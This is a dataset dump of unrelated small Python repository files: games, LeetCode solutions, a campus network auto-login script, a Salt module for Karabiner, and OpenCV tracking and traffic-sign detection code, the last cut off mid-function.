    """
    player1 = 'wrong'
    while player1 not in ('X', 'O'):
        player1 = input('Player1 - Enter the choice (X/O):').upper()
        if player1 not in ('X', 'O'):
            print('sorry wrong Choice')
    player2 = 'O' if player1 == 'X' else 'X'
    return player1, player2
# --- interactive game loop ---------------------------------------------------
# Cell 0 is a sentinel; cells 1-9 start as their own digit and are replaced
# by 'X'/'O' as moves are made.
# NOTE(review): the board is never reset between games, so replaying with the
# same process reuses the previous board — presumably unintended; confirm.
board = ['0','1', '2', '3', '4', '5', '6', '7', '8', '9']
gameon = True
while gameon:
    welcome_msg()
    intialboard(board)
    player1, player2 = user_input_choice()
    print(f'player1 choosed {player1}')
    print(f'player2 choosed {player2}')
    # Up to nine turns: odd turn numbers belong to player 1, even to player 2.
    for i in range(1,10):
        if i%2 == 0:
            place = user_input_place(board,player='2')
            board = replace_position(board, place,player2)
            intialboard(board)
            if win_check(board,mark=player2):
                print('Player2 won the match')
                break
        else:
            place = user_input_place(board, player='1')
            board = replace_position(board, place, player1)
            intialboard(board)
            if win_check(board, mark=player1):
                print('Player1 won the match')
                break
    # End the program once the board is full.
    if fullboardcheck(board):
        gameon=False
| [
"noreply@github.com"
] | deepu0322.noreply@github.com |
cf93f564313818cf88c36c9ec4c7b6741882aed2 | b43c1b98b8b780c5a5e9a9e109037609f179c94e | /Week_03/46.全排列.py | 3d43b5963d7605a248190a6422a79d66114b26d7 | [] | no_license | wangliangguo/algorithm022 | fbb2ae87bee15fc91c1e824545746d9823ed601e | 5f78d15d16b8be2b0685118c6c05d42c42c0a7f6 | refs/heads/main | 2023-02-15T00:25:00.505641 | 2021-01-14T10:30:36 | 2021-01-14T10:30:36 | 323,300,241 | 0 | 0 | null | 2020-12-21T10:17:51 | 2020-12-21T10:17:51 | null | UTF-8 | Python | false | false | 671 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#@Author :wangliangguo
#@time : 2021/1/2 下午9:19
class Solution:
    def permute(self, nums: List[int]) -> List[List[int]]:
        """Return all permutations of ``nums`` via backtracking.

        ``exist`` tracks the indices already placed on the current path, so
        duplicate *values* in ``nums`` are still treated as distinct
        elements.  NOTE(review): ``List`` is not imported here — on LeetCode
        the typing names are injected; running this file standalone would
        raise NameError at class-definition time.
        """
        ans = []
        exist = []
        def recurse(nums, index, state):
            # A full-length path is one complete permutation; copy it out,
            # since ``state`` is mutated in place by the backtracking below.
            if index >= len(nums):
                ans.append(state[:])
                return
            for i in range(len(nums)):
                if i in exist:
                    continue
                exist.append(i)
                state.append(nums[i])
                recurse(nums, index + 1, state)
                # Undo the choice before trying the next index.
                exist.pop()
                state.pop()
        recurse(nums, 0, [])
        return ans
| [
"chenwangliangguo@qq.com"
] | chenwangliangguo@qq.com |
49267d7eb47ce72b1d0c45946087ead08e76e723 | 83af3b6ff2df0abba5a3f356e6e0aeff97cdf8c9 | /xls.py | fc27a85940a000f523fe7e9121e66e624b40eb32 | [] | no_license | spiritdan/pypypy_v2 | f57ebb2e08708780f268cae97f1191bff102c1bb | 07107457f5f8fbdb9411f37a42f6841f28cea6e0 | refs/heads/master | 2020-04-16T14:20:17.915939 | 2019-02-14T12:48:58 | 2019-02-14T12:48:58 | 165,663,122 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | import openpyxl
# Demo: build a workbook with openpyxl, title the active sheet "漫威宇宙"
# ("Marvel Universe"), write A1, append two rows, and save to Marvel.xlsx.
wb=openpyxl.Workbook()
sheet=wb.active
sheet.title='漫威宇宙'
sheet['A1']='漫威宇宙'
rows=[['美国队长','钢铁侠','蜘蛛侠'],['是','漫威','宇宙', '经典','人物']]
for i in rows:
    sheet.append(i)
wb.save('Marvel.xlsx')
# Re-open the saved workbook and read the sheet names and cell A1 back.
wb = openpyxl.load_workbook('Marvel.xlsx')
sheet=wb['漫威宇宙']
sheetname = wb.sheetnames
print(sheetname)
A1_cell=sheet['A1']
A1_value=A1_cell.value
print(A1_value) | [
"spirit_dan@163.com"
] | spirit_dan@163.com |
300ca1b420e0855500c2ce64de330e26c19d61d7 | 4c33cad76db13b680700566a5787c2e2fd20d487 | /helloworld.py | c62311eff06185c1c14a7cb8f2f630b78cb9a7af | [] | no_license | universalfabric/MasterClass | de7a7e5959eeaaf439b841cbfe5a907cc328c64b | c542068b61959998a9d0dc67d00d4fab5e8aa2a4 | refs/heads/master | 2020-04-26T13:27:15.261729 | 2019-03-25T02:11:53 | 2019-03-25T02:11:53 | 173,579,757 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 70 | py | # print("Hello World"!)
# Print the greeting 20 times; the "\n" inside the literal adds a blank line
# between repetitions on top of print()'s own trailing newline.
greet = "Hello World!\n"
print(greet * 20)
| [
"mike.freimuth@gmail.com"
] | mike.freimuth@gmail.com |
3a7a02f31a6979f75ec7c427dfbb6289b7b7eb59 | 1e38f8146781063559e117068127d767c503f9ec | /tex/img/plot1.py | 0275952909066ec070198d7a0c8fe477dc4ec75f | [] | no_license | kklocker/funksjonalintegralmetoder | 4530931ced3ccac98ab4f19a71fa55dd7a3b2ed1 | e85b6463cabda9d6215bfe9004e1036c6883792f | refs/heads/master | 2023-06-29T14:35:41.976960 | 2021-07-31T12:51:09 | 2021-07-31T12:51:09 | 202,173,572 | 0 | 2 | null | 2020-10-06T08:02:51 | 2019-08-13T15:29:48 | TeX | UTF-8 | Python | false | false | 287 | py | import numpy as np
import matplotlib.pyplot as plt
# Plot the two eigenvalue branches of a 2x2 coupling between a flat level
# ef and a dispersive band ek = k**2 with coupling strength Vb — the
# classic avoided-crossing formula E± = (ek+ef)/2 ± sqrt((ek-ef)²/4 + Vb²).
# NOTE(review): physical interpretation inferred from the formulas; confirm.
ef = 1
k = np.linspace(0,1.5)
ek = k**2
Vb = 1/4
Ekp = 1/2 * (ek + ef + np.sqrt((ek-ef)**2 + 4*Vb**2))
Ekm = 1/2 * (ek + ef - np.sqrt((ek-ef)**2 + 4*Vb**2))
plt.plot(k, Ekp)
plt.plot(k, Ekm)
plt.show()
print(k, ek, Ekp, Ekm)
| [
"karladlock@gmail.com"
] | karladlock@gmail.com |
d6a1639ba1d05703af45df4dc4ebeedac75f0043 | 6c7f5803ef79acbba014024673ab357323d9e222 | /auth-iitk_ironport.py | 790b4acbce252fb6d29c72ee54167dbfab795868 | [] | no_license | satendrapandeymp/Auth_IITK | bf2371448fc5e293630b299e60aaa8ca6ee76ca4 | 5973d8e6e5c3e87a6026f35cf093e019dc369328 | refs/heads/master | 2021-09-08T14:10:09.935290 | 2018-03-10T08:42:53 | 2018-03-10T08:42:53 | 115,193,846 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 834 | py | import urllib2, time, urllib
def internet_on():
    """Probe connectivity by opening google.com with a 1s timeout.

    NOTE(review): the return value is INVERTED relative to the name —
    False means the probe succeeded (we are already online/authenticated),
    True means it failed.  The login loop below relies on this meaning:
    it re-authenticates only when this returns True.
    """
    try:
        urllib2.urlopen('https://www.google.com', timeout=1)
        return False
    except urllib2.URLError as err:
        return True
# Python 2 script (urllib2 / print statement): keep the IITK captive-portal
# session alive by re-posting the login form whenever connectivity drops.
opener = urllib2.build_opener()
# Spoof a browser user agent; some portals reject the default urllib2 agent.
opener.addheaders = [('User-Agent', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0')]
# SECURITY NOTE(review): credentials are stored in plaintext in this file.
username = 'Put your username here'
password = 'Put your password here'
data = {"username": username, "password":password, "sid":0}
login_data = urllib.urlencode(data)
while(True):
    # True here means the connectivity probe FAILED (see internet_on above).
    check = internet_on()
    if check:
        try:
            # POST the credentials, then back off for 5 minutes.
            test = opener.open('https://authenticate.iitk.ac.in/netaccess/loginuser.html', login_data)
            time.sleep(300)
        except:
            # Portal unreachable: retry quickly.
            time.sleep(2)
            print 'Can not connect now'
    else:
        # Already online: re-check every 5 minutes.
        time.sleep(300)
| [
"noreply@github.com"
] | satendrapandeymp.noreply@github.com |
f4ef114a8e9ae1a4bd7d4f231e49391596865911 | 9eabd6b6537dd6adf466d0a243d59abd288b1871 | /_modules/karabiner.py | 1e8bb969d1ce4e2ab0250125192a9b837124c333 | [
"MIT"
] | permissive | mdavezac/CondimentStation | f9f6545c6544c5c25311438d28b96f382f16c646 | d4c88c5889241719dab9657fe8225a430c23043f | refs/heads/master | 2020-12-07T05:25:10.590759 | 2018-11-18T11:41:11 | 2018-11-18T11:41:11 | 46,870,954 | 1 | 3 | MIT | 2018-01-14T15:38:03 | 2015-11-25T15:45:17 | Python | UTF-8 | Python | false | false | 2,311 | py | # -*- coding: utf-8 -*-
'''
Karabiner setup
'''
from __future__ import absolute_import
# Import python libs
import copy
import logging
# Import salt libs
import salt.utils
from salt.exceptions import CommandExecutionError, MinionError
log = logging.getLogger(__name__)
cli = "/Applications/Karabiner.app/Contents/Library/bin/karabiner"
""" Command-line application """
def list_profiles(**kwargs):
    ''' List current profiles '''
    # __salt__ is injected by the Salt loader when this module is loaded.
    cmd = cli + " list"
    return __salt__['cmd.run_all'](cmd,
                                   output_loglevel='trace',
                                   python_shell=False)['stdout']
def selected():
    ''' Return the currently selected profile (CLI stdout). '''
    cmd = cli + " selected"
    return __salt__['cmd.run_all'](cmd,
                                   output_loglevel='trace',
                                   python_shell=False)['stdout']
def select(name):
    ''' Select a profile by index (if ``name`` is numeric) or by name. '''
    try:
        cmd = cli + " select " + str(int(name))
    except:
        # Not an integer: fall back to selecting by profile name.
        cmd = cli + " select_by_name " + str(name)
    return __salt__['cmd.run_all'](cmd,
                                   output_loglevel='trace',
                                   python_shell=False)['stdout']
def set_param(profile, key, value):
    ''' Set ``key`` to ``value`` in ``profile``.

    Temporarily selects ``profile`` and always restores the previously
    selected profile afterwards (the finally block runs even on error).
    '''
    original = selected()
    try:
        select(profile)
        return __salt__['cmd.run_all'](cli + " set " + key + " " + str(value),
                                       output_loglevel='trace',
                                       python_shell=False)['stdout']
    finally:
        select(original)
def get_params(profile='Default'):
    ''' Return the changed settings of ``profile`` as a dict.

    Temporarily selects ``profile``, parses the output of ``karabiner
    changed`` (one ``key=value`` line per setting), and restores the
    previously selected profile afterwards.  Keys starting with
    ``notsave`` are dropped.
    '''
    original = selected()
    try:
        select(profile)
        output = __salt__['cmd.run_all'](cli + " changed",
                                         output_loglevel='trace',
                                         python_shell=False)['stdout']
        result = {}
        for line in output.split('\n'):
            # Split only on the first '=' so values containing '=' are
            # preserved (the old unbounded split raised ValueError on them).
            key, value = line.split('=', 1)
            if not key.startswith('notsave'):
                result[key] = value
        return result
    finally:
        select(original)
def relaunch():
    ''' Restart the Karabiner application via its CLI. '''
    __salt__['cmd.run'](cli + " relaunch")
def append_profile(name, **kwargs):
    ''' Append a new profile called ``name``; returns the full cmd result dict. '''
    cmd = cli + " append " + name
    return __salt__['cmd.run_all'](cmd,
                                   output_loglevel='trace',
                                   python_shell=False)
| [
"m.davezac@ucl.ac.uk"
] | m.davezac@ucl.ac.uk |
8847c3263a8b3bcbd8e6dd2f05c05064b4479df6 | cccb39f0c9916397dc9ee9a8326cefdb3027df6b | /python/RFC_downloader.py | 1edb5d7936285deb9bd51bb28a4976ceececfc11 | [
"MIT"
] | permissive | tbedford/code-snippets | 2946d8e7e28bd53367cd27687a7f2b561a335b6c | 00da6496040004b717e20673e0d74203fe34eddf | refs/heads/master | 2023-06-26T00:27:05.519551 | 2023-06-15T16:32:57 | 2023-06-15T16:32:57 | 131,804,613 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 322 | py | import sys, urllib.request
try:
    # The RFC number comes from the first command-line argument.
    rfc_number = int (sys.argv[1])
except (IndexError, ValueError):
    # Missing argument (IndexError) or non-numeric argument (ValueError).
    print('supply RFC number as argument.')
    sys.exit(2)
template = 'http://www.ietf.org/rfc/rfc{}.txt'
url = template.format(rfc_number)
# Fetch the RFC text and decode it (UTF-8 by default) before printing.
rfc_raw = urllib.request.urlopen(url).read()
rfc = rfc_raw.decode()
print(rfc)
| [
"tony.bedford@live.co.uk"
] | tony.bedford@live.co.uk |
9e8347f3ee2a079d974e2bdbee6c34880736fe6e | d8a9b88f4087ebfe97b462e589071222e2261e47 | /520. Detect Capital.py | 05ac6786a14cb0b3bec7c1c660096e885cf8269c | [] | no_license | rohitpatwa/leetcode | a7a4e8a109ace53a38d613b5f898dd81d4771b1b | f4826763e8f154cac9134d53b154b8299acd39a8 | refs/heads/master | 2021-07-07T12:40:30.424243 | 2021-03-31T00:21:30 | 2021-03-31T00:21:30 | 235,003,084 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | # Check if word is all upper or all lower. elif check if word is one capital and all lower. Else return False.
class Solution:
    def detectCapitalUse(self, word: str) -> bool:
        """Capital usage is legal when the word is ALL CAPS, all
        lowercase, or capitalized (first letter only)."""
        is_upper = word == word.upper()
        is_lower = word == word.lower()
        is_title = word[0] == word[0].upper() and word[1:] == word[1:].lower()
        if is_upper or is_lower or is_title:
            return True
return False | [
"rohitpatwa@gmail.com"
] | rohitpatwa@gmail.com |
14e70c6f02f9d9fc19b6d2424ac79354626bc67e | d56d6bce5abd08bf476d23139190171657fac027 | /robotics/InteractiveTracking.py | 5230aa44e551312d9e82c0a0de2719a2bc1e9f9e | [] | no_license | ssgantayat/DetectionWithTracking | 9efc4ec3e70c2c0f1d845536146896a8f275edaa | 154edb55802ecf05ff814a420c4824f38bdd5287 | refs/heads/master | 2022-03-19T06:25:04.931990 | 2014-08-07T09:40:48 | 2014-08-07T09:40:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,968 | py | """
Author: Travis Dick (travis.barry.dick@gmail.com)
"""
import os
import cv
import cv2
import numpy as np
from CascadeTracker import *
from Homography import *
from ImageUtils import *
from NNTracker import *
class InteractiveTrackingApp:
    def __init__(self, tracker, filename=None, tracker_name=None,name="vis"):
        """ An interactive window for initializing and visualizing tracker state.

        The on_frame method should be called for each new frame. Typically real
        applications subclass InteractiveTrackingApp and build in some application
        loop that captures frames and calls on_frame.

        Parameters:
        -----------
        tracker : TrackerBase
            Any class implementing the interface of TrackerBase.

        filename : string
            Output directory (created if missing); annotated per-frame JPEGs
            and a '<tracker_name>.txt' corner log are written there.

        name : string
            The name of the window. Due to some silliness in OpenCV this must
            be unique (in the set of all OpenCV window names).

        See Also:
        ---------
        StandaloneTrackingApp
        RosInteractiveTrackingApp
        """
        self.tracker = tracker
        self.name = name
        # Rectangle-drag initialization state (used by mouse_handler).
        self.m_start = None
        # New definition
        self.m_ur = None
        self.m_ll = None
        self.m_end = None
        # Four-corner initialization state (used by mouse_handler4/on_frame).
        self.initparamtemp = []
        self.initparam = None
        # End of new definition
        self.gray_img = None
        self.paused = False
        self.img = None
        self.times = 1
        self.filename = filename
        if not os.path.exists(filename):
            os.mkdir(filename)
        # Corner log: one header row, then one row per tracked frame.
        self.fname = open(filename+'/'+tracker_name+'.txt','w')
        self.fname.write('%-8s%-8s%-8s%-8s%-8s%-8s%-8s%-8s%-8s\n'%('frame','ulx','uly','urx','ury','lrx','lry','llx','lly'))
        cv2.namedWindow(self.name)
        #cv2.setMouseCallback(self.name, self.mouse_handler4)
        #self.writer = cv2.VideoWriter('alpha.avi',cv.CV_FOURCC('D','I','V','3'),10,size)
    def display(self, img):
        """Draw the tracked (green) or clicked (blue) region on a copy of
        ``img``, log the tracked corners, show the window and save the
        annotated frame to the output directory."""
        annotated_img = img.copy()
        if self.tracker.is_initialized():
            corners = self.tracker.get_region()
            draw_region(annotated_img, corners, (0,255,0), 2)
            self.fname.write('%-15s%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f\n'%('frame'+('%05d'%(self.times))+'.jpg',corners[0,0],corners[1,0],corners[0,1],corners[1,1],corners[0,2],corners[1,2],corners[0,3],corners[1,3]))
            # '''
            # if self.m_start != None and self.m_end != None:
            #     ul = (min(self.m_start[0],self.m_end[0]), min(self.m_start[1],self.m_end[1]))
            #     lr = (max(self.m_start[0],self.m_end[0]), max(self.m_start[1],self.m_end[1]))
            #     corners = np.array([ ul, [lr[0],ul[1]], lr, [ul[0],lr[1]]]).T
            # '''
        elif len(self.initparamtemp) == 4:
            corners = self.initparamtemp
            draw_region(annotated_img, corners, (255,0,0), 1)
            #self.fname.write('%-15s%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f\n'%('frame'+('%05d'%(self.times))+'.jpg',corners[0,0],corners[1,0],corners[0,1],corners[1,1],corners[0,2],corners[1,2],corners[0,3],corners[1,3]))
        cv2.imshow(self.name, annotated_img)
        cv.WaitKey(500)
        #if self.times == 1: cv.WaitKey(6000)
        #self.writer.write(annotated_img)
        cv.SaveImage( self.filename+'/'+'%04d'%self.times+'.jpg',cv.fromarray(annotated_img))
    def mouse_handler(self, evt,x,y,arg,extra):
        """Drag-a-rectangle initialization callback.

        Not registered by default — see the commented setMouseCallback call
        in __init__.  Pauses tracking during the drag and initializes the
        tracker with the dragged rectangle on button release.
        """
        if self.gray_img == None: return
        if evt == cv2.EVENT_LBUTTONDOWN and self.m_start == None:
            self.m_start = (x,y)
            self.m_end = (x,y)
            self.paused = True
        elif evt == cv2.EVENT_MOUSEMOVE and self.m_start != None:
            self.m_end = (x,y)
        elif evt == cv2.EVENT_LBUTTONUP:
            self.m_end = (x,y)
            ul = (min(self.m_start[0],self.m_end[0]), min(self.m_start[1],self.m_end[1]))
            lr = (max(self.m_start[0],self.m_end[0]), max(self.m_start[1],self.m_end[1]))
            self.tracker.initialize_with_rectangle(self.gray_img, ul, lr)
            self.m_start, self.m_end = None, None
            self.paused = False
            self.inited = True
            #cv.WaitKey(1000)
    def mouse_handler4(self,evt,x,y,arg,extra):
        """Click-four-corners initialization callback (not registered by
        default).  A fifth click restarts the corner collection; once four
        corners exist the tracker is initialized with them."""
        if self.gray_img == None: return
        if evt == cv2.EVENT_LBUTTONDOWN and len(self.initparamtemp) <= 3:
            self.initparamtemp.append([x,y])
            self.paused = True
        elif evt == cv2.EVENT_LBUTTONDOWN and len(self.initparamtemp) == 4:
            self.initparamtemp = []
            self.initparamtemp.append([x,y])
            self.paused = True
        if len(self.initparamtemp) == 4:
            self.initparam = np.array(self.initparamtemp).T
            self.tracker.initialize(self.gray_img,self.initparam)
            self.paused = False
            self.inited = True
    def on_frame(self, img, numtimes,initparamtemp):
        """Process one BGR frame.

        On frame number 150 the tracker is (re)initialized from
        ``initparamtemp`` (four [x, y] corner points).  Unless paused, the
        frame is blurred/grayscaled and fed to the tracker, then displayed.
        Space toggles pause; any other key press makes this return False
        (caller should stop).  Returns True otherwise.
        """
        print(numtimes)
        self.times = numtimes
        if numtimes == 150:
            #cv.WaitKey(6000)
            #self.initparamtemp = [[336,165],[362,165],[362,226],[336,226]]
            self.initparamtemp = initparamtemp
            self.initparam = np.array(self.initparamtemp).T
            self.gray_img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
            self.gray_img = self.gray_img.astype(np.float64)
            self.tracker.initialize(self.gray_img,self.initparam)
            self.paused = False
            self.inited = True
        '''
        if len(self.initparamtemp) == 4:
            corners = 
            self.fname.write('%-15s%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f\n'%('frame'+('%05d'%(self.times))+'.jpg',corners[0,0],corners[1,0],corners[0,1],corners[1,1],corners[0,2],corners[1,2],corners[0,3],corners[1,3]))
        '''
        if not self.paused:
            self.img = img
            self.gray_img = cv2.GaussianBlur(to_grayscale(img), (5,5), 3)
            #self.gray_img = to_grayscale(img)
            self.tracker.update(self.gray_img)
        #else:
        #    cv.WaitKey(10)
        if self.img != None: self.display(self.img)
        key = cv.WaitKey(7)
        if key == ord(' '): self.paused = not self.paused
        elif key > 0: return False
        self.times = self.times + 1
        return True
    def cleanup(self):
        """Close the corner log file."""
        #cv2.destroyWindow(self.name)
        #pass
        self.fname.close()
        #self.writer.release
| [
"ankush1123roy@gmail.com"
] | ankush1123roy@gmail.com |
871132389561d6b5b48a9d5e7d876bc1654d5ee6 | f2889a13368b59d8b82f7def1a31a6277b6518b7 | /30.py | 75414b4d6be012ed0fdb069967fc9cd91daa06d6 | [] | no_license | htl1126/leetcode | dacde03de5c9c967e527c4c3b29a4547154e11b3 | c33559dc5e0bf6879bb3462ab65a9446a66d19f6 | refs/heads/master | 2023-09-01T14:57:57.302544 | 2023-08-25T15:50:56 | 2023-08-25T15:50:56 | 29,514,867 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,038 | py | # ref: https://discuss.leetcode.com/topic/10665/concise-python-code-using
# -defaultdict
import collections
import copy
class Solution(object):
    def findSubstring(self, s, words):
        """
        :type s: str
        :type words: List[str]
        :rtype: List[int]

        Sliding-window search (Python 2: note xrange below).  For each of
        the ``wl`` possible alignments, a window of word-sized chunks is
        advanced over ``s``; a Counter copy tracks how many of each word
        remain unmatched, and the left edge ``i`` is advanced whenever a
        chunk is over-consumed.  A window of exactly ``total`` characters
        means every word matched once, so ``i`` is recorded.

        NOTE(review): returns None (not []) for empty input, which deviates
        from the annotated List[int] return type — confirm callers accept it.
        """
        if not words or not words[0]:
            return None
        wl, total, strlen, res = (len(words[0]), len(words) * len(words[0]),
                                  len(s), [])
        word_ctr = collections.Counter(words)
        for i in xrange(wl):
            j = i
            count = copy.copy(word_ctr)
            while j < strlen - wl + 1:
                count[s[j:j + wl]] -= 1
                # Shrink from the left until no word is over-consumed.
                while count[s[j:j + wl]] < 0:
                    count[s[i:i + wl]] += 1
                    i += wl
                j += wl
                if j - i == total:
                    res += i,
        return res
if __name__ == '__main__':
    sol = Solution()
    # Python 2 print statement; expected output: [0, 9]
    print sol.findSubstring('barfoothefoobarman', ['foo', 'bar'])
| [
"b93902098@ntu.edu.tw"
] | b93902098@ntu.edu.tw |
d8fef3f5a96c4891f675eb2abd81d61207e43e46 | 4c80bcfba6f0a6869ff6ff1d2f7e965f82867049 | /Optical Flow/main.py | e7c671d162e669aaabda1e9b914fa3dca1df3b71 | [] | no_license | himol7/Traffic-Sign-Detection-and-Classification-Under-Challenging-Conditions | 358ca1544c367c41502053d8220f11cb34ae214f | c20109db7f83de8759dae2d0bbc4b14a60e65feb | refs/heads/master | 2020-04-10T13:03:56.758935 | 2018-12-09T14:57:53 | 2018-12-09T14:57:53 | 161,039,040 | 8 | 2 | null | 2018-12-09T12:51:42 | 2018-12-09T12:51:42 | null | UTF-8 | Python | false | false | 14,518 | py | import cv2
import numpy as np
import matplotlib.pyplot as plt
from math import sqrt
from skimage.feature import blob_dog, blob_log, blob_doh
import imutils
import argparse
import os
import math
from classification import training, getLabel
SIGNS = ["ERROR",
"STOP",
"TURN LEFT",
"TURN RIGHT",
"DO NOT TURN LEFT",
"DO NOT TURN RIGHT",
"ONE WAY",
"SPEED LIMIT",
"OTHER"]
# Clean all previous file
def clean_images():
    """Delete every file in the working directory whose name contains '.png'."""
    for entry in os.listdir('./'):
        if '.png' in entry:
            os.remove(entry)
### Preprocess image
def constrastLimit(image):
    """Equalize the luma channel of a BGR image.

    Converts to YCrCb, histogram-equalizes the Y channel only (so the
    chroma channels, and thus colors, are preserved) and converts back.
    """
    ycrcb = cv2.cvtColor(image, cv2.COLOR_BGR2YCrCb)
    channels = cv2.split(ycrcb)
    channels[0] = cv2.equalizeHist(channels[0])
    equalized = cv2.merge(channels)
    return cv2.cvtColor(equalized, cv2.COLOR_YCrCb2BGR)
def LaplacianOfGaussian(image):
    """Edge response: Gaussian blur, grayscale, Laplacian, absolute 8-bit.

    The positional Laplacian arguments are kept exactly as in the original
    call so the numeric behaviour is unchanged.
    """
    smoothed = cv2.GaussianBlur(image, (3,3), 0)
    gray = cv2.cvtColor(smoothed, cv2.COLOR_BGR2GRAY)
    response = cv2.Laplacian(gray, cv2.CV_8U,3,3,2)
    return cv2.convertScaleAbs(response)
def binarization(image):
    """Fixed binary threshold at 32; pixels above it become 255, others 0."""
    _, mask = cv2.threshold(image, 32, 255, cv2.THRESH_BINARY)
    return mask
def preprocess_image(image):
    """Full preprocessing chain: contrast equalization -> LoG edges -> binary mask."""
    return binarization(LaplacianOfGaussian(constrastLimit(image)))
# Find Signs
def removeSmallComponents(image, threshold):
    """Return a mask keeping only connected white blobs of at least
    ``threshold`` pixels (label 0 is the background and is always dropped)."""
    count, labels, stats, _ = cv2.connectedComponentsWithStats(image, connectivity=8)
    # Last stats column is the component area; skip the background row.
    areas = stats[1:, -1]
    cleaned = np.zeros(labels.shape, dtype=np.uint8)
    for label, area in enumerate(areas, start=1):
        if area >= threshold:
            cleaned[labels == label] = 255
    return cleaned
def findContour(image):
    """Return the external contours of a binary image.

    imutils.is_cv2() selects the right tuple slot, since the return layout
    of cv2.findContours differs between OpenCV 2 and OpenCV 3.
    """
    #find contours in the thresholded image
    cnts = cv2.findContours(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE )
    cnts = cnts[0] if imutils.is_cv2() else cnts[1]
    return cnts
def contourIsSign(perimeter, centroid, threshold):
    """Decide whether a contour is circular enough to be a traffic sign.

    Builds the distance "signature" of the contour points around `centroid`,
    normalized by the maximum distance; a near-circular contour has every
    normalized distance close to 1.

    Args:
        perimeter: contour points as returned by cv2.findContours
                   (each entry is a 1x2 point array).
        centroid: (cx, cy) center of the contour.
        threshold: maximum allowed mean deviation of the signature from 1.

    Returns:
        (is_sign, crop_radius): whether the contour qualifies, and the max
        distance plus a 2-pixel margin (used later as a crop half-width).
    """
    # FIX: the original called bare sqrt(), but only `import math` is visible
    # in this file's imports, so it raised NameError at runtime.
    # math.hypot computes the Euclidean distance directly.
    distances = [
        math.hypot(p[0][0] - centroid[0], p[0][1] - centroid[1])
        for p in perimeter
    ]
    max_value = max(distances)
    signature = [dist / max_value for dist in distances]
    # Mean deviation of the signature from a perfect circle (all ones).
    mean_deviation = sum(1 - s for s in signature) / len(signature)
    return mean_deviation < threshold, max_value + 2
#crop sign
def cropContour(image, center, max_distance):
    """Crop a square window of half-width `max_distance` around `center`,
    clamped to the image bounds.

    NOTE(review): center[0] is clamped against the image *height* but used
    to slice the second axis (and vice versa) — the axes look swapped;
    behavior is preserved exactly as written.
    """
    height, width = image.shape[0], image.shape[1]
    top = max(int(center[0] - max_distance), 0)
    bottom = min(int(center[0] + max_distance + 1), height - 1)
    left = max(int(center[1] - max_distance), 0)
    right = min(int(center[1] + max_distance + 1), width - 1)
    print(left, right, top, bottom)
    return image[left:right, top:bottom]
def cropSign(image, coordinate):
    """Crop the rectangle ((left, top), (right, bottom)), clamped to bounds."""
    height, width = image.shape[0], image.shape[1]
    (x0, y0), (x1, y1) = coordinate[0], coordinate[1]
    top = max(int(y0), 0)
    bottom = min(int(y1), height - 1)
    left = max(int(x0), 0)
    right = min(int(x1), width - 1)
    return image[top:bottom, left:right]
def findLargestSign(image, contours, threshold, distance_theshold):
    """Among all contours, crop the farthest-reaching circular candidate.

    Returns (sign, coordinate): the cropped patch (or None) and its padded
    bounding box [(left-2, top-2), (right+3, bottom+1)] (or None).
    """
    best_distance = 0
    coordinate = None
    sign = None
    for contour in contours:
        moments = cv2.moments(contour)
        if moments["m00"] == 0:  # degenerate contour: no area, no centroid
            continue
        cx = int(moments["m10"] / moments["m00"])
        cy = int(moments["m01"] / moments["m00"])
        is_sign, distance = contourIsSign(contour, [cx, cy], 1 - threshold)
        if is_sign and distance > best_distance and distance > distance_theshold:
            best_distance = distance
            points = np.reshape(contour, [-1, 2])
            left, top = np.amin(points, axis=0)
            right, bottom = np.amax(points, axis=0)
            coordinate = [(left - 2, top - 2), (right + 3, bottom + 1)]
            sign = cropSign(image, coordinate)
    return sign, coordinate
def findSigns(image, contours, threshold, distance_theshold):
    """Crop every contour that passes the circularity and distance tests.

    Returns (signs, coordinates): the cropped patches and their padded
    bounding boxes as [(top-2, left-2), (right+1, bottom+1)] pairs.
    """
    signs, coordinates = [], []
    for contour in contours:
        # Centroid from the contour's spatial moments.
        moments = cv2.moments(contour)
        if moments["m00"] == 0:
            continue
        cx = int(moments["m10"] / moments["m00"])
        cy = int(moments["m01"] / moments["m00"])
        is_sign, max_distance = contourIsSign(contour, [cx, cy], 1 - threshold)
        if not (is_sign and max_distance > distance_theshold):
            continue
        signs.append(cropContour(image, [cx, cy], max_distance))
        points = np.reshape(contour, [-1, 2])
        top, left = np.amin(points, axis=0)
        right, bottom = np.amax(points, axis=0)
        coordinates.append([(top - 2, left - 2), (right + 1, bottom + 1)])
    return signs, coordinates
def localization(image, min_size_components, similitary_contour_with_circle, model, count, current_sign_type):
    """Detect, classify and annotate the largest sign candidate in one frame.

    Returns (coordinate, annotated_image, sign_type, text). `coordinate` is
    None and `sign_type` is -1 when no candidate was found. Side effects:
    shows the binary mask in a window and writes each classified crop to
    '<count>_<label>.png'.
    """
    original_image = image.copy()
    # Candidate mask: preprocess, drop small blobs, keep sign-like colors.
    mask = preprocess_image(image)
    mask = removeSmallComponents(mask, min_size_components)
    mask = cv2.bitwise_and(mask, mask, mask=remove_other_color(image))
    cv2.imshow('BINARY IMAGE', mask)
    contours = findContour(mask)
    sign, coordinate = findLargestSign(original_image, contours, similitary_contour_with_circle, 15)
    text = ""
    sign_type = -1
    if sign is not None:
        # Classify the crop; anything above 8 collapses into the OTHER class.
        sign_type = getLabel(model, sign)
        sign_type = min(sign_type, 8)
        text = SIGNS[sign_type]
        cv2.imwrite(str(count) + '_' + text + '.png', sign)
    if sign_type > 0 and sign_type != current_sign_type:
        # Newly seen sign: draw its box and label on the returned frame.
        cv2.rectangle(original_image, coordinate[0], coordinate[1], (0, 255, 0), 1)
        font = cv2.FONT_HERSHEY_PLAIN
